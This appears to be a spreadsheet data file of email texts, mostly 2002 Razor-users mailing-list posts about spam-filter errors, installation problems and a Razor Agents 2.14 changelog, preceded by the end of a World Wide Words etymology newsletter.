call it a hawk.What seems to have happened is that the similarity in shape between
the brickie's board and the academic cap led some wag, probably at
Oxford University, to apply the name of the one to the other. Our
first recorded use is in a book of 1853-6, "The Adventures of Mr.
Verdant Green, an Oxford Freshman" by a clergyman named Edward
Bradley, who wrote under the pen name of Cuthbert Bede (the names
of the two patron saints of Durham, where he went to school).
Verdant Green is a sort of undergraduate Pickwick and the book
recounts his adventures. This magisterial reprimand by a don
appears after one such escapade: "I will overlook your offence in
assuming that portion of the academical attire, to which you gave
the offensive epithet of 'mortar-board'; more especially, as you
acted at the suggestion and bidding of those who ought to have
known better".After a slow start, the book became a huge success, selling more
than 200,000 copies in the next 20 years. Whether Mr Bradley
invented the slang term we may never know, but his book certainly
popularised it.                        -----------Q. I got into a discussion about "chip off the old block" with
friends, and we are wondering if it had to do with sculpting,
jewelry making, woodworking, or none of the above. What does this
term mean, and where did it come from? [Vijay Renganathan]A. The associations are with carpentry, and the block is definitely
made of wood.The first form of the expression was "chip of the same block",
meaning that a person or thing was made of the same stuff as
somebody or something else, so from the same source or parentage.
An early example is in a sermon by Dr Robert Sanderson (at one time
Bishop of Lincoln), dated 1637: "Am not I a child of the same Adam
... a chip of the same block, with him?".Later that century, another form is recorded "a chip of the old
block", which meant that somebody was the spitting image of his
father, or continued some family characteristic. At some point,
probably late in the nineteenth century, this was modified to "a
chip off the old block", which does nothing to change the sense,
but is the way it's now usually written or said.
5. Endnote
-------------------------------------------------------------------
"The sum of human wisdom is not contained in any one language, and
no single language is capable of expressing all forms and degrees
of human comprehension." [Ezra Pound, quoted by David Crystal in
the "Guardian", 25 October 1999]
6. Subscription commands
-------------------------------------------------------------------
To leave the list, change your subscription address, or subscribe,
please visit .Or, you can send a message to 
from the address at which you are (or want to be) subscribed:  To leave, send: SIGNOFF WORLDWIDEWORDS
  To join, send: SUBSCRIBE WORLDWIDEWORDS First-name Last-name
7. Contact addresses
-------------------------------------------------------------------
Do not use the address that comes up when you hit 'Reply' on this
mailing, or your message will be sent to an electronic dead-letter
office. Either create a new message, or change the outgoing 'To:'
address to one of these:  For general comments: .
  For Q&amp;A section questions: .-------------------------------------------------------------------
World Wide Words is copyright (c) Michael Quinion 2002.  All rights
reserved. The Words Web site is at .
-------------------------------------------------------------------
You may reproduce this newsletter in whole or in part in other free
media online provided that you include this note and the copyright
notice above. Reproduction in print media or on Web pages requires
prior permission: contact .
-------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">Can anyone offer some insight into the following error?  I am able to pipe mail 
through razor-check as root and it works fine but when it goes through the user 
filter via postfix I get the errors below.  What's strange is that this just 
started, I've made no changes, and it was running beautifully for days.The goods:Jul 22 10:59:39.878996 check[29891]: [ 1] [bootup] Logging initiated 
LogDebugLevel=3 to file:razor-agent.log
Jul 22 10:59:39.880196 check[29891]: [ 2]  Razor-Agents v2.12 starting razor-
check
Jul 22 10:59:41.929484 check[29891]: [ 3] Unable to connect to ARRAY
(0x80ff3c8):2703; Reason: Invalid argument.
Jul 22 10:59:41.934032 check[29891]: [ 1] vr4_signature: Bad ep4:
Jul 22 10:59:41.935634 check[29891]: [ 3] Unable to connect to ARRAY
(0x80ff3c8):2703; Reason: Invalid argument.
Jul 22 10:59:41.936022 check[29891]: [ 1] razor-check error: checkit: connect1: 
nextserver: No Razor servers available at this timeTIA!~S~
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">on Thu, Jul 18, 2002 at 01:18:01PM -0700, Chad Norwood wrote:
&gt; On 18/07/02 15:13 -0400, Steven Champeon wrote:
&gt; ) 
&gt; ) Chad, has there been any progress on this? Thanks.
&gt; 
&gt; 
&gt;   We are constantly working and improving the overall system,
&gt;   client code, server code, logic, etc.  Sometimes the long term
&gt;   fix is not apparent right away with specific issues seen by 
&gt;   razor-users.  
&gt; 
&gt;   If a mail is reported and revoked by the same identity,
&gt;   it still might be considered spam.  Oh, OK. That doesn't make sense. :) Can someone manually remove/revoke
the message in question, then, while you work constantly to improve and
tweak the system? Thanks :)
&gt; ) &gt; I immediately revoked it, using the mutt command "|" and "razor-revoke",
&gt; ) &gt; but it appears to still be in razor. Hashes are as follows:
&gt; ) &gt; 
&gt; ) &gt; 1 part N/A e1: Zh19_7n6GRBFk6lyr8PYJcIWGJ8A
&gt; ) &gt; 1 part 0 e3: q_vLZZ9m-ZAD3N3e7ieSzeeYekaYF83f6G11dfcTy9kA
&gt; ) &gt; 1 part 0 e4: dcq2LaohnBmKsqUJW4xnOsdyk9EA, ep4: 7542-10-- 
hesketh.com/inc. v: (919) 834-2552 f: (919) 834-2554 w: http://hesketh.com
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
  There was a server bug on the backup discovery server.  
  It's fixed now.  cheers,
  chad
On 22/07/02 10:39 -0400, Scott Augustus wrote:
) Can anyone offer some insight into the following error?  I am able to pipe mail 
) through razor-check as root and it works fine but when it goes through the user 
) filter via postfix I get the errors below.  What's strange is that this just 
) started, I've made no changes, and it was running beautifully for days.
) 
) The goods:
) 
) Jul 22 10:59:39.878996 check[29891]: [ 1] [bootup] Logging initiated 
) LogDebugLevel=3 to file:razor-agent.log
) Jul 22 10:59:39.880196 check[29891]: [ 2]  Razor-Agents v2.12 starting razor-
) check
) Jul 22 10:59:41.929484 check[29891]: [ 3] Unable to connect to ARRAY
) (0x80ff3c8):2703; Reason: Invalid argument.
) Jul 22 10:59:41.934032 check[29891]: [ 1] vr4_signature: Bad ep4:
) Jul 22 10:59:41.935634 check[29891]: [ 3] Unable to connect to ARRAY
) (0x80ff3c8):2703; Reason: Invalid argument.
) Jul 22 10:59:41.936022 check[29891]: [ 1] razor-check error: checkit: connect1: 
) nextserver: No Razor servers available at this time
) 
) TIA!
) 
) ~S~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</si>
  <si>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Apologies if this has been answered before on this list.  I can't
find a way to search the archives.  I did my best to scan through
the archive messages, but can't find my answer.  Please advise if
there is a search engine somewhere, Thanks. I'm trying to set up a smtp relay mail server using postfix,
Spamassassin, and amavisd-new.  (no local delivery, just an
anti-spam filter box)  I have installed razor-agents-sdk-2.02 and
razor-agents-2.125 (in that order) on a RH 7.3 box for this.  But
when I try to load amavisd from the command line (as root), I get
errors with:  Can't locate Razor/Client.pm in @INC.  But the machine does have
a Client.pm on it, in fact, several, at:/usr/lib/perl5/5.6.1/Client.pm
/usr/lib/perl5/site_perl/5.6.1/WAIT/Client.pm
/usr/lib/perl5/site_perl/5.6.1/Client.pm
/usr/lib/perl5/vendor_perl/5.6.1/Frontier/Client.pm.rawcall
/usr/lib/perl5/vendor_perl/5.6.1/Frontier/Client.pmWhat am I missing?  Thanks!Scott-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Jul 23, 2002 at 05:28:33PM -0400,
Scott Henderson  is thought to have said:&gt; What am I missing?  Thanks!Razor/Client.pm is part of Razor v1. You've installed Razor v2.
Spamassassin's current release only works with v1. Although IIRC
the current CVS code works with v2.Tabor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</si>
  <si>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On Tue, 23 Jul 2002, Tabor J. Wells wrote:
&gt;Razor/Client.pm is part of Razor v1. You've installed Razor v2.
&gt;Spamassassin's current release only works with v1. Although IIRC
&gt;the current CVS code works with v2.Thanks, Tabor.  How do I install v1 over v2, and where does one
get it?  (I don't see it at razor.sourceforge.net)-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Jul 23, 2002 at 06:06:05PM -0400,
Scott Henderson  is thought to have said:&gt; Thanks, Tabor.  How do I install v1 over v2, and where does one
&gt; get it?  (I don't see it at razor.sourceforge.net)It's there. Scroll down on the downloads page. However you might
consider going the other way and installing SpamAssassin's 2.40
bleeding-edge code as Razor v2 has a lot of nice features over v1.--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</si>
  <si>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On Tue, Jul 23, 2002 at 06:16:02PM -0400, Tabor J. Wells wrote:
&gt; It's there. Scroll down on the downloads page. However you might
&gt; consider going the other way and installing SpamAssassin's 2.40
&gt; bleeding-edge code as Razor v2 has a lot of nice features over v1.To paraphrase something I heard once:
Unless you like looking for a new job, never install a non-released or
development-only version of software anywhere where the results of such
code are important.ie: Don't run development code on a production machine. :)
The problem isn't SA anyway, it looks for Razor1 and just keeps on
going if it can't find it.  Something came up about amavis on the SA
list where it looks for Razor itself...-- 
Randomly Generated Tagline:
"Duct tape is like the force; it has a light side &amp; a dark side, and it
 holds the universe together." - Zen Musings
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt; Thanks, Tabor.  How do I install v1 over v2, and where does one
&gt;&gt; get it?  (I don't see it at razor.sourceforge.net)
&gt;
&gt;It's there. Scroll down on the downloads page. However you might
&gt;consider going the other way and installing SpamAssassin's 2.40
&gt;bleeding-edge code as Razor v2 has a lot of nice features over v1.Hmmm... installed SA 2.40, but I get the same error when trying
to launch amavisd-new (can't find Razor/Client.pm).  Seems like
the amavis code is calling for this.  I'll hit up the
amavis-users list.  (Feel free to fire off the answer if you
have it, though!   :)-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
Today's error(received multiple times) was:Jul 23 21:16:39.288680 report[98557]: [ 2]  Razor-Agents v2.12 starting
razor-report ./jobspam
Jul 23 21:16:46.597147 report[98558]: [ 1] razor-report error: reportit:
Error 213 while authenticating, aborting.I really like the concept of Razor but I find myself wondering if it's
really a good idea for the developers to be passing off what appears
to be alpha-quality software as production-ready....
/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
                               Patrick Greenwell
         Asking the wrong questions is the leading cause of wrong answers
\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Until a few days ago, razor (sdk 2.03, client 2.12) was catching a
decent set of spams.  It seems now, however, that it isn't catching
anything.  I got one email this morning with "ADV:" in the subject
another two or three about how many inches longer I can be.  Did I
miss something recently perhaps regarding configuration changes, etc?Thanks in advance,Joe
---
Joe Berry
joe@topshot.com
AIM "joe topshot"
Yahoo Msgr "joetopshot"
Baltimore, MD-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Jul 23, 2002 at 09:21:58PM -0700,
Patrick  is thought to have said:&gt; Today's error(received multiple times) was:
&gt; 
&gt; Jul 23 21:16:39.288680 report[98557]: [ 2]  Razor-Agents v2.12 starting
&gt; razor-report ./jobspam
&gt; Jul 23 21:16:46.597147 report[98558]: [ 1] razor-report error: reportit:
&gt; Error 213 while authenticating, aborting.I believe this is fixed (or at least there's a workaround in place to try
again) in 2.125&gt; I really like the concept of Razor but I find myself wondering if it's
&gt; really a good idea for the developers to be passing off what appears
&gt; to be alpha-quality software as production-ready....And where does it say production-ready? http://razor.sourceforge.net says at
the top of the page:June 13, 2002 - Vipul's Razor v2 released! The first beta of Vipul's Razor
v2 is now available for public download.Likewise Vipul's announcement post about v2 to this list states that it is 
beta in the first sentence.Tabor--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</si>
  <si>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On Wed, 24 Jul 2002, Tabor J. Wells wrote:&gt; On Tue, Jul 23, 2002 at 09:21:58PM -0700,
&gt; Patrick  is thought to have said:
&gt;
&gt; &gt; Today's error(received multiple times) was:
&gt; &gt;
&gt; &gt; Jul 23 21:16:39.288680 report[98557]: [ 2]  Razor-Agents v2.12 starting
&gt; &gt; razor-report ./jobspam
&gt; &gt; Jul 23 21:16:46.597147 report[98558]: [ 1] razor-report error: reportit:
&gt; &gt; Error 213 while authenticating, aborting.
&gt;
&gt; I believe this is fixed (or at least there's a workaround in place to try
&gt; again) in 2.125Thanks.&gt; &gt; I really like the concept of Razor but I find myself wondering if it's
&gt; &gt; really a good idea for the developers to be passing off what appears
&gt; &gt; to be alpha-quality software as production-ready....
&gt;
&gt; And where does it say production-ready? http://razor.sourceforge.net says at
&gt; the top of the page:
&gt;
&gt; June 13, 2002 - Vipul's Razor v2 released! The first beta of Vipul's Razor
&gt; v2 is now available for public download.
&gt;
&gt; Likewise Vipul's announcement post about v2 to this list states that it is
&gt; beta in the first sentence.I sit corrected. I guess we could argue if it's even beta quality(I'd say
I have about a 50/50 chance of reports being submitted), but I
don't think that would be productive. :-)/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
                               Patrick Greenwell
         Asking the wrong questions is the leading cause of wrong answers
\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Tabor J. Wells wrote:
&gt; And where does it say production-ready? http://razor.sourceforge.net
&gt; says at the top of the page:
&gt;
&gt; June 13, 2002 - Vipul's Razor v2 released! The first beta of Vipul's
&gt; Razor v2 is now available for public download.1)  I think the code is still very much pre-beta.2)  When you go to the "Download" page, it tells you "Fetch the latest
versions of razor-agents and razor-agents-sdk packages"  It is not at all
clear that these are development packages.The site is badly designed, and very misleading.  IMO.  The fact that the
word "beta" appears in the middle of some introductory text on the front
page is hardly a valid argument.  (Well accepted software design "fact":
USERS DON'T READ *ANYTHING*)I get the impression that Vipul &amp; co are deliberately trying to mislead
users into downloading the dev code in order to get more unwitting test
sites.But that's just my opinion, I could be wrong.rOD.--
Anyway... long story short...
...is a phrase whose origins are complicated and rambling.&gt;&gt; Doing the blogging thang again at http://www.groovymother.com/ &lt;&lt;-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">rODbegbie wrote:
&gt; I get the impression that Vipul &amp; co are deliberately trying to
&gt; mislead users into downloading the dev code in order to get more
&gt; unwitting test sites.Apologies to all.  In re-reading, that sentence sounds a lot harsher than I
intended.As the old maxim goes, "Never ascribe to malice that which can be equally
explained by incompetence".I'll shut up now.rOD.--
"Fast!  Fast!  Faster!  Bring the beef, you bastard,"
cries Paula Abdul, "and don't forget the pasta!"&gt;&gt; Doing the blogging thang again at http://www.groovymother.com/ &lt;&lt;-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 24 Jul 2002, rODbegbie wrote:&gt; rODbegbie wrote:
&gt; &gt; I get the impression that Vipul &amp; co are deliberately trying to
&gt; &gt; mislead users into downloading the dev code in order to get more
&gt; &gt; unwitting test sites.
&gt;
&gt; Apologies to all.  In re-reading, that sentence sounds a lot harsher than I
&gt; intended.The question I have is: what needs to be done/help needs to be provided to
make the system suck less? It's obviously a great idea, it just needs some
work.../\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
                               Patrick Greenwell
         Asking the wrong questions is the leading cause of wrong answers
\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; On Wed, 24 Jul 2002, Patrick wrote:
&gt; &gt;On Wed, 24 Jul 2002, rODbegbie wrote:
&gt; &gt;
&gt; &gt; &gt;rODbegbie wrote:
&gt; &gt; &gt; &gt;I get the impression that Vipul &amp; co are deliberately trying to
&gt; &gt; &gt; &gt;mislead users into downloading the dev code in order to get more
&gt; &gt; &gt; &gt;unwitting test sites.
&gt; &gt;
&gt; &gt; &gt;Apologies to all.  In re-reading, that sentence sounds a lot harsher
than I
&gt; &gt; &gt;intended.
&gt; &gt;
&gt; &gt;The question I have is: what needs to be done/help needs to be provided
to
&gt; &gt;make the system suck less? It's obviously a great idea, it just needs
some
&gt; &gt;work...That's simple.  The same thing that any beta project needs to improve.
Continuous
End-User testing, constructive feedback, and suggestions on how to improve
the
system.  Upgrade each time a new beta version comes out, so everyone is
testing
on the same version of the code, and old bugs don't get reported as being in
the
new version, thus slowing down the debugging process.Report any installation issues, bugs, errors, etc., to the V2 beta list
(http://lists.sourceforge.net/lists/listinfo/razor-testers) so that they can
be quickly
looked at, etc.  Provide detailed description of issues, include logs if
possible,
as well as any "captured" spam that generated the error(s).
Thank you, please drive through,
- AA --------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">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razor-testers@lists.sf.net or to chad@cloudmark.comcheers,
vipul.On Wed, Jul 24, 2002 at 10:02:51AM -0700, Patrick wrote:
&gt; On Wed, 24 Jul 2002, rODbegbie wrote:
&gt; 
&gt; &gt; rODbegbie wrote:
&gt; &gt; &gt; I get the impression that Vipul &amp; co are deliberately trying to
&gt; &gt; &gt; mislead users into downloading the dev code in order to get more
&gt; &gt; &gt; unwitting test sites.
&gt; &gt;
&gt; &gt; Apologies to all.  In re-reading, that sentence sounds a lot harsher than I
&gt; &gt; intended.
&gt; 
&gt; The question I have is: what needs to be done/help needs to be provided to
&gt; make the system suck less? It's obviously a great idea, it just needs some
&gt; work...
&gt; 
&gt; /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
&gt;                                Patrick Greenwell
&gt;          Asking the wrong questions is the leading cause of wrong answers
&gt; \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
&gt;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</si>
  <si>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unsubscribeAt 12:26 PM 7/24/02 -0400, rODbegbie wrote:
&gt;Tabor J. Wells wrote:
&gt; &gt; And where does it say production-ready? http://razor.sourceforge.net
&gt; &gt; says at the top of the page:
&gt; &gt;
&gt; &gt; June 13, 2002 - Vipul's Razor v2 released! The first beta of Vipul's
&gt; &gt; Razor v2 is now available for public download.
&gt;
&gt;1)  I think the code is still very much pre-beta.
&gt;
&gt;2)  When you go to the "Download" page, it tells you "Fetch the latest
&gt;versions of razor-agents and razor-agents-sdk packages"  It is not at all
&gt;clear that these are development packages.
&gt;
&gt;The site is badly designed, and very misleading.  IMO.  The fact that the
&gt;word "beta" appears in the middle of some introductory text on the front
&gt;page is hardly a valid argument.  (Well accepted software design "fact":
&gt;USERS DON'T READ *ANYTHING*)
&gt;
&gt;I get the impression that Vipul &amp; co are deliberately trying to mislead
&gt;users into downloading the dev code in order to get more unwitting test
&gt;sites.
&gt;
&gt;But that's just my opinion, I could be wrong.
&gt;
&gt;rOD.
&gt;
&gt;--
&gt;Anyway... long story short...
&gt;...is a phrase whose origins are complicated and rambling.
&gt;
&gt; &gt;&gt; Doing the blogging thang again at http://www.groovymother.com/ &lt;&lt;
&gt;
&gt;
&gt;
&gt;-------------------------------------------------------
&gt;This sf.net email is sponsored by:ThinkGeek
&gt;Welcome to geek heaven.
&gt;http://thinkgeek.com/sf
&gt;_______________________________________________
&gt;Razor-users mailing list
&gt;Razor-users@lists.sourceforge.net
&gt;https://lists.sourceforge.net/lists/listinfo/razor-users--
Christopher VanOosterhout
Torresen Marine, Inc.
Internet Division
http://www.torresen.com/
http://www.marinedieseldirect.com/
3126 Lake Shore Drive
Muskegon, Michigan 49441
231-759-8596-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wednesday 24 July 2002 08:42 am,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&gt;
&gt; As the old maxim goes, "Never ascribe to malice that which can be equally
&gt; explained by incompetence".Oh Yeah that sounds a WHOLE lot better... (chuckle).-- 
_________________________________________________
No I Don't Yahoo!
And I'm getting pretty sick of being asked if I do.
_________________________________________________
John Andersen / Juneau Alaska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
</t>
  </si>
  <si>
    <t xml:space="preserve">ignore----- Original Message -----
From: "Christopher VanOosterhout" 
To: 
Sent: Thursday, July 25, 2002 7:51 AM
Subject: [Razor-users] unsubscribe
&gt; unsubscribe
&gt;
&gt; At 09:13 PM 7/24/02 -0800, John Andersen wrote:
&gt; &gt;On Wednesday 24 July 2002 08:42 am, rODbegbie wrote:
&gt; &gt; &gt; rODbegbie wrote:
&gt; &gt; &gt; &gt; I get the impression that Vipul &amp; co are deliberately trying to
&gt; &gt; &gt; &gt; mislead users into downloading the dev code in order to get more
&gt; &gt; &gt; &gt; unwitting test sites.
&gt; &gt; &gt;
&gt; &gt; &gt; Apologies to all.  In re-reading, that sentence sounds a lot harsher
than I
&gt; &gt; &gt; intended.
&gt; &gt; &gt;
&gt; &gt; &gt; As the old maxim goes, "Never ascribe to malice that which can be
equally
&gt; &gt; &gt; explained by incompetence".
&gt; &gt;
&gt; &gt;Oh Yeah that sounds a WHOLE lot better... (chuckle).
&gt; &gt;
&gt; &gt;--
&gt; &gt;_________________________________________________
&gt; &gt;No I Don't Yahoo!
&gt; &gt;And I'm getting pretty sick of being asked if I do.
&gt; &gt;_________________________________________________
&gt; &gt;John Andersen / Juneau Alaska
&gt; &gt;
&gt; &gt;
&gt; &gt;-------------------------------------------------------
&gt; &gt;This sf.net email is sponsored by: Jabber - The world's fastest growing
&gt; &gt;real-time communications platform! Don't just IM. Build it in!
&gt; &gt;http://www.jabber.com/osdn/xim
&gt; &gt;_______________________________________________
&gt; &gt;Razor-users mailing list
&gt; &gt;Razor-users@lists.sourceforge.net
&gt; &gt;https://lists.sourceforge.net/lists/listinfo/razor-users
&gt;
&gt; --
&gt; Christopher VanOosterhout
&gt; Torresen Marine, Inc.
&gt; Internet Division
&gt; http://www.torresen.com/
&gt; http://www.marinedieseldirect.com/
&gt; 3126 Lake Shore Drive
&gt; Muskegon, Michigan 49441
&gt; 231-759-8596
&gt;
&gt;
&gt;
&gt; -------------------------------------------------------
&gt; This sf.net email is sponsored by: Jabber - The world's fastest growing
&gt; real-time communications platform! Don't just IM. Build it in!
&gt; http://www.jabber.com/osdn/xim
&gt; _______________________________________________
&gt; Razor-users mailing list
&gt; Razor-users@lists.sourceforge.net
&gt; https://lists.sourceforge.net/lists/listinfo/razor-users-------------------------------------------------------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
</t>
  </si>
  <si>
    <t xml:space="preserve">
This is a stable beta release.  Please to upgrade.http://prdownloads.sourceforge.net/razor/razor-agents-2.14.tar.gz?downloadI've listed below all changes since the last major release, 2.12.
These are also in the Changes file included with the tar.gz.-chad
2.14 (July 25, 2002)
   Â·   Added Digest::Nilsimsa and URI::Escape to Make-
       file.PL's prerequisites.  [vipul]   Â·   Fixed rare bug in report.  Thanks goes to "Alan A."
        for this and much more help.  [chad]2.126 (July 24, 2002)
   Â·   Improved logic again for detecting spam.  [chad,
       vipul]   Â·   Run-time warnings are disabled unless in debug mode.
       [chad]2.125 (July 18, 2002)
   Â·   Improved logic for detecting spam, now we only look at
       visible and/or significant mime parts.  [chad, vipul]   Â·   Mime parts cleaned to only whitespace are now ignored
       on the client side, that is, they are not checked
       against server [chad]   Â·   Fixed bug in report (err 202) [chad]   Â·   Quieted more warnings [chad]2.123 (July 17, 2002)
   Â·   Fixed bug in revoke/report [chad]   Â·   Whitelist now looks at all 'Received:' headers for
       matching [chad]   Â·   Added debuglevel, whitelist cmd-line options [chad]   Â·   Quieted more warnings [chad]2.122 (July 15, 2002)
   Â·   Renamed razor-register razor-admin. To register, you
       must 'razor-admin -register' [chad]   Â·   Cleanded up how we store mail parts.  Each mail object
       now has a part object that stores info relevant to
       that part.  [chad]   Â·   Fixed parse_mbox (reading mbox and rfc822 mails)
       [chad]   Â·   Backup any existing identity files before writing over
       them (with new identity) [chad]   Â·   Added lock file support, so only one process writes to
       servers.*.lst at a time [chad]   Â·   Added rediscover_wait_dns [chad]   Â·   Fixed a bug when we rediscover, we save info to list
       correctly but when using it we skip the first server
       [chad]
   Â·   Fixed whitelist so rule 'from xx' only matches 'From:
       .*xx' not 'From .*xx' (Note the ':') [chad]   Â·   Made exit codes cleaner [chad]
        0 or 1       =&gt; no error
        2 or greater =&gt; error   Â·   Fixed error msg/exit code after disconnect [chad]   Â·   Added -w to razor binaries [chad]   Â·   If authen fails 'cuz unknown user (213), attempt re-
       register [chad]   Â·   Quieted a bunch of warnings [chad]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
</t>
  </si>
  <si>
    <t xml:space="preserve">I cannot determine if a verbatim forwarded message from Agent is handled
correctly i.e. that a message with Content-Type: message/rfc822 does not
include the original header lines improperly in the email body when reporting
the spam. It would be really nice and convenient if it supported as the Agent
verbatim forwarding option is easy to use. 
SpamCop does understand the format.
See an examle below:- JÃ¸rgenReturn-Path: 
Delivered-To: jth@jth.net
Received: from vennely1 (vennely1 [194.192.106.109])
	by mail.jth.net (Postfix) with SMTP id 17A9118684
	for ; Fri, 26 Jul 2002 02:15:03 +0200 (CEST)
From: =?ISO-8859-1?Q?J=F8rgen_Thomsen?= 
To: j@jth.net
Subject: (fwd) [Razor-users] Razor Agents 2.14 Released
Date: Fri, 26 Jul 2002 02:14:57 +0200
Message-ID: 
X-Mailer: Forte Agent 1.91/32.564
MIME-Version: 1.0
Content-Type: message/rfc822
Content-Disposition: inlineReturn-Path: 
Delivered-To: list@jth.net
Received: from usw-sf-list2.sourceforge.net (usw-sf-fw2.sourceforge.net
[216.136.171.252])
	by mail.jth.net (Postfix) with ESMTP id 88B0F18684
	for ; Fri, 26 Jul 2002 01:18:00 +0200 (CEST)and the rest of the original header and the body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
</t>
  </si>
  <si>
    <t xml:space="preserve">  Not sure what you're asking.  
  Content-Type: message/rfc822 mails are handled like attachments
  and are not broken down further into mime parts.  That is, the attachment
  is treated as one part.  The headers and body of the message/rfc822 are
  sent to the server without parsing.  The other way to handle it is to treat it like
  a regular mail, and break it down into parts.
  There are reasons to break it down and not to break it down, and right 
  now we chose not to break it down.  This might change in the future.  -chadOn 26/07/02 02:24 +0200, JÃ¸rgen Thomsen wrote:
) I cannot determine if a verbatim forwarded message from Agent is handled
) correctly i.e. that a message with Content-Type: message/rfc822 does not
) include the original header lines improperly in the email body when reporting
) the spam. It would be really nice and convenient if it supported as the Agent
) verbatim forwarding option is easy to use. 
) SpamCop does understand the format.
) See an examle below:
) 
) - JÃ¸rgen
) 
) Return-Path: 
) Delivered-To: jth@jth.net
) Received: from vennely1 (vennely1 [194.192.106.109])
) 	by mail.jth.net (Postfix) with SMTP id 17A9118684
) 	for ; Fri, 26 Jul 2002 02:15:03 +0200 (CEST)
) From: =?ISO-8859-1?Q?J=F8rgen_Thomsen?= 
) To: j@jth.net
) Subject: (fwd) [Razor-users] Razor Agents 2.14 Released
) Date: Fri, 26 Jul 2002 02:14:57 +0200
) Message-ID: 
) X-Mailer: Forte Agent 1.91/32.564
) MIME-Version: 1.0
) Content-Type: message/rfc822
) Content-Disposition: inline
) 
) Return-Path: 
) Delivered-To: list@jth.net
) Received: from usw-sf-list2.sourceforge.net (usw-sf-fw2.sourceforge.net
) [216.136.171.252])
) 	by mail.jth.net (Postfix) with ESMTP id 88B0F18684
) 	for ; Fri, 26 Jul 2002 01:18:00 +0200 (CEST)
) 
) and the rest of the original header and the body
) 
) 
) -------------------------------------------------------
